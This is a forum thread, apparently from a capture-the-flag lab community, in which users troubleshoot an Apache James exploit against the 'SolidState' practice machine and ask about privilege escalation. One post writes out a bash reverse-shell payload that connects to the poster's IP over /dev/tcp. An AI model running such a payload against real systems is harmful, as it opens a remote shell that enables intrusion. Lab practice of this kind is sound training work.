Solidstate Revisit

Hi,
I’m working on solidstate now, following the offical writeup and ippsec’s video. But I found the exploit 35513 doesn’t work anymore. I couldn’t get a reverse shell after ssh login use mindy, could anyone try it to see if the exploit still work?

Thanks in advance.

just worked for me no problem, im on VIP 19 and the box says it hasnt been reverted in 3 days at that

I still can’t make it work. I just change the exploit 35513.py to use my own ip address "payload = ‘/bin/bash -i >& /dev/tcp/10.10.14.2/443 0>&1’ ", then execute it to deliver the payload, then use mindy ssh login to the machine, and get this garbage information but the shell never call back my nc listener:

Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $’\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003’: command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $‘L\004nameq~\002L’: command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $‘remoteAddrq~\002L’: command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $’\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp’: command not found
-rbash: $‘L\005stateq~\002xpsr\035org.apache.mailet.MailAddress’: command not found
-rbash: team@team.pl: No such file or directory
-rbash: 4054205.0.1543226381071.JavaMail.root@solidstate: No such file or directory
-rbash: MIME-Version:: command not found
-rbash: Content-Type:: command not found
-rbash: Content-Transfer-Encoding:: command not found
-rbash: Delivered-To:: command not found
-rbash: /etc/bash_completion.d/4D61696C313534333232363338313034352D30.Repository.FileStreamStore: line 7: syntax error near unexpected token (' -rbash: /etc/bash_completion.d/4D61696C313534333232363338313034352D30.Repository.FileStreamSt're: line 7: Received: from 10.10.14.2 ([10.10.14.2])

the exploit worked for me, but for priv esv when i try to edit the file in vi, i get issues.
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal
any thoughts on getting around this?

1.try vi but cann’t operate normally
2. try “cp” like the walkthrough but said “are the same files”
how to handle this??